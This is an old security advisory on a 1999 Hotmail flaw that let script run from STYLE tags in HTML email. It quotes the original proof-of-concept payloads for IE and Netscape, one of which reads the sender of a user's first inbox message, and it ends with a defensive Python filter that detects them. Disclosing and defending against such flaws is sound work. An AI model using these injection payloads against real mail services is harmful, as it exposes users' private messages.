Title Hotmail Javascript STYLE Vulnerability
Published 1999-09-13-12:00AM
Updated 1999-09-13-12:00AM
Class Input Validation Error
CVE   CAN-1999-0750
Remote  Yes
Local  Unknown
Credit  This vulnerability was posted to Bugtraq by Georgi Guninski <joro@nat.bg>
Vulnerable
  Netscape Communicator 4.6
    Caldera OpenLinux Desktop 2.3
    Caldera OpenLinux eBuilder 3.0
    Conectiva Linux 4.1
    Conectiva Linux 4.2
    Conectiva Linux 5.0
    Conectiva Linux 5.1
    Microsoft Windows 2000 Professional
    Microsoft Windows 95
    Microsoft Windows 98
    Microsoft Windows NT 4.0
    RedHat Linux 5.2 alpha
    RedHat Linux 5.2 i386
    RedHat Linux 5.2 sparc
    RedHat Linux 6.0
    RedHat Linux 6.0 alpha
    RedHat Linux 6.0 sparc
    RedHat Linux 6.1 alpha
    RedHat Linux 6.1 i386
    RedHat Linux 6.1 sparc
    RedHat Linux 6.2 alpha
    RedHat Linux 6.2 i386
    RedHat Linux 6.2 sparc
    S.u.S.E. Linux 7.0
    SCO eDesktop 2.4
    SCO eServer 2.3
  Netscape Communicator 4.5
    Caldera OpenLinux Desktop 2.3
    Caldera OpenLinux eBuilder 3.0
    Conectiva Linux 3.0
    Conectiva Linux 4.0
    Conectiva Linux 4.1
    Conectiva Linux 4.2
    Conectiva Linux 5.0
    Conectiva Linux 5.1
    MandrakeSoft Linux Mandrake 6.0
    MandrakeSoft Linux Mandrake 6.1
    MandrakeSoft Linux Mandrake 7.0
    MandrakeSoft Linux Mandrake 7.1
    Microsoft Windows 2000 Professional
    Microsoft Windows 95
    Microsoft Windows 98
    Microsoft Windows NT 4.0
    RedHat Linux 5.2 alpha
    RedHat Linux 5.2 i386
    RedHat Linux 5.2 sparc
    RedHat Linux 6.0
    RedHat Linux 6.0 alpha
    RedHat Linux 6.0 sparc
    RedHat Linux 6.1 alpha
    RedHat Linux 6.1 i386
    RedHat Linux 6.1 sparc
    RedHat Linux 6.2 alpha
    RedHat Linux 6.2 i386
    RedHat Linux 6.2 sparc
    S.u.S.E. Linux 7.0
    SCO eDesktop 2.4
    SCO eServer 2.3
  Netscape Communicator 4.0
    Caldera OpenLinux Desktop 2.3
    Caldera OpenLinux eBuilder 3.0
    Conectiva Linux 3.0
    Conectiva Linux 4.0
    Conectiva Linux 4.1
    Conectiva Linux 4.2
    Conectiva Linux 5.0
    Conectiva Linux 5.1
    MandrakeSoft Linux Mandrake 6.0
    MandrakeSoft Linux Mandrake 6.1
    MandrakeSoft Linux Mandrake 7.0
    MandrakeSoft Linux Mandrake 7.1
    Microsoft Windows 2000 Professional
    Microsoft Windows 95
    Microsoft Windows 98
    Microsoft Windows NT 4.0
    RedHat Linux 5.2 alpha
    RedHat Linux 5.2 i386
    RedHat Linux 5.2 sparc
    RedHat Linux 6.0
    RedHat Linux 6.0 alpha
    RedHat Linux 6.0 sparc
    RedHat Linux 6.1 alpha
    RedHat Linux 6.1 i386
    RedHat Linux 6.1 sparc
    RedHat Linux 6.2 alpha
    RedHat Linux 6.2 i386
    RedHat Linux 6.2 sparc
    S.u.S.E. Linux 7.0
    SCO eDesktop 2.4
    SCO eServer 2.3
  Microsoft Internet Explorer 5.0 for Windows NT 4.0
    Microsoft Windows NT 4.0
  Microsoft Internet Explorer 5.0 for Windows 98
    Microsoft Windows 98
  Microsoft Internet Explorer 5.0 for Windows 95
    Microsoft Windows 95
  Microsoft Internet Explorer 5.0 for Windows 2000
    Microsoft Windows 2000 Professional
  Microsoft Hotmail
Not Vulnerable  
Code   From Georgi Guninski's <joro@nat.bg> post to Bugtraq:

The code that must be embedded in an HTML email message is:
For IE 5.0:

<P STYLE="left:expression(eval('alert(\'JavaScript is executed\');window.close()'))" >

For Netscape Communicator:

<STYLE TYPE="text/javascript">
alert('JavaScript is executed');
a=window.open(document.links[2]);
setTimeout('alert(\'The first message in your Inbox is from: \'+a.document.links[26].text)',20000);
</STYLE>
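
Added example, not part of Guninski's post or of this advisory: a Python check that a webmail filter could run over an HTML message body to flag both vectors shown above, script in a STYLE attribute via expression() and a STYLE element declared as TYPE="text/javascript". The function names, finding labels and sample messages are constructed for illustration.

```python
import re
from html.parser import HTMLParser

# CSS constructs that run script: IE's expression() and javascript: URLs.
ACTIVE_CSS = re.compile(r"expression\s*\(|javascript\s*:", re.IGNORECASE)
# A STYLE element in mail may only declare plain CSS (or no type at all).
SAFE_STYLE_TYPES = {"", "text/css"}

def normalise_css(css):
    """Drop CSS comments and backslash escapes so matching sees the bare tokens."""
    return re.sub(r"/\*.*?\*/", "", css, flags=re.DOTALL).replace("\\", "")

class StyleScriptFinder(HTMLParser):
    """Records script carried by STYLE attributes or STYLE elements."""
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.findings = []
        self.in_style = False

    def handle_starttag(self, tag, attrs):
        attrs = {name: value or "" for name, value in attrs}
        if tag == "style":
            self.in_style = True
            declared = attrs.get("type", "").strip().lower()
            if declared not in SAFE_STYLE_TYPES:
                self.findings.append(("style-element-type", declared))
        if ACTIVE_CSS.search(normalise_css(attrs.get("style", ""))):
            self.findings.append(("style-attribute-script", tag))

    def handle_endtag(self, tag):
        if tag == "style":
            self.in_style = False

    def handle_data(self, data):
        if self.in_style and ACTIVE_CSS.search(normalise_css(data)):
            self.findings.append(("style-element-script", "style"))

def scan_mail_html(body):
    """Return a list of (finding, detail) tuples for one HTML message body."""
    finder = StyleScriptFinder()
    finder.feed(body)
    finder.close()
    return finder.findings

# Constructed samples modelled on the two vectors above, plus a harmless message.
IE_SAMPLE = """<P STYLE="left:expression(eval('alert(1)'))">text</P>"""
NS_SAMPLE = """<STYLE TYPE="text/javascript">alert(1);</STYLE>"""
BENIGN = """<p style="color:red">hi</p><style type="text/css">p{margin:0}</style>"""

if __name__ == "__main__":
    for sample in (IE_SAMPLE, NS_SAMPLE, BENIGN):
        print(scan_mail_html(sample))
```

A filter acting on these findings is safer removing the whole STYLE attribute or element than trying to rewrite its contents.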
Copyright 2007, SecurityDot